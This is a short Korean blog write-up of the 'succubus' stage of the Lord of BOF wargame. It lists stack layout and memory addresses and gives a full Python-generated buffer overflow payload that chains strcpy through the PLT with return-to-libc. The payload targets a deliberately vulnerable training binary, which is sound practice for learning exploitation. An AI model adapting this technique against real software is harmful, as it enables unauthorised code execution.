본문 바로가기

Wargames/Load Of BOF

LOB Redhat 6.2 - succubus


succubus - PLT

Stack : *addr[4] + buffer[40] + sfp[4] + ret[4]

strcpy(PLT) : 0x8048410

buffer : 0xbffffa90

strcpy_dest : 0xbffffac0
strcpy_source : 0xbffffa90

Payload : ./nightmare `python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "A"*32 + "\x10\x84\x04\x08" + "AAAA" + "\xc0\xfa\xff\xbf" + "\x90\xfa\xff\xbf"'`


Using strcpy + RTL

'Wargames > Load Of BOF' 카테고리의 다른 글

LOB Redhat 6.2 - xavius  (0) 2015.11.02
LOB Redhat 6.2 - nightmare  (0) 2015.11.02
LOB Redhat 6.2 - zombie_assassin  (0) 2015.10.30
LOB Redhat 6.2 - assassin  (0) 2015.10.30
LOB Redhat 6.2 - giant  (0) 2015.10.30